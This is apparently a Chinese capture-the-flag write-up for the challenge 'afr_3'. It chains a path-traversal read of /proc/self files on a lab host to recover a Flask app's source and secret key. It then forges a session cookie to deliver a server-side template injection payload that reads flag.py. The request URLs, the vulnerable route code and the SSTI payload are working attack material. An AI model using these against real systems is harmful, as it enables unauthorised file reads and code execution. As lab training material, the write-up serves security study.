afr_3

考查内容：对linux系统中/proc/目录下文件作用的了解，同时考查了flask模板注入

请求 http://192.168.60.134/article?name=…/…/…/…/…/proc/self/cmdline获取当前执行系统命令，得到

查看源代码，中间有个空格的

python server.py

请求 http://192.168.60.134/article?name=…/…/…/…/…/proc/self/cwd/server.py获取源码

@app.route("/n1page", methods=["GET", "POST"])
def n1page():
    if request.method != "POST":
        return redirect(url_for("index"))
    n1code = request.form.get("n1code") or None
    if n1code is not None:
        n1code = n1code.replace(".", "").replace("_", "").replace("{","").replace("}","")
    if "n1code" not in session or session['n1code'] is None:
        session['n1code'] = n1code
    template = None
    if session['n1code'] is not None:
     '''
     这里存在SSTI
     '''
        template = '''<h1>N1 Page</h1> <div class="row> <div class="col-md-6 col-md-offset-3 center"> Hello : %s, why you don't look at our <a href='/article?name=article'>article</a>? </div> </div> ''' % session['n1code']
        session['n1code'] = None
    return render_template_string(template)

发现flag在flag.py,flask的appkey在key.py,但是此处任意文件读取漏洞被过滤了关键词flag

源码里存在flask SSTI，前提是可以伪造flask的cookie，这里需要用到appkey https://noraj.github.io/flask-session-cookie-manager/

请求 http://192.168.60.134/article?name=…/…/…/…/…/proc/self/cwd/key.py获取appkey

1. 伪造cookie为SSTI的payload获取flag.

{{''.__class__.__mro__[2].__subclasses__()[40]('flag.py').read()}}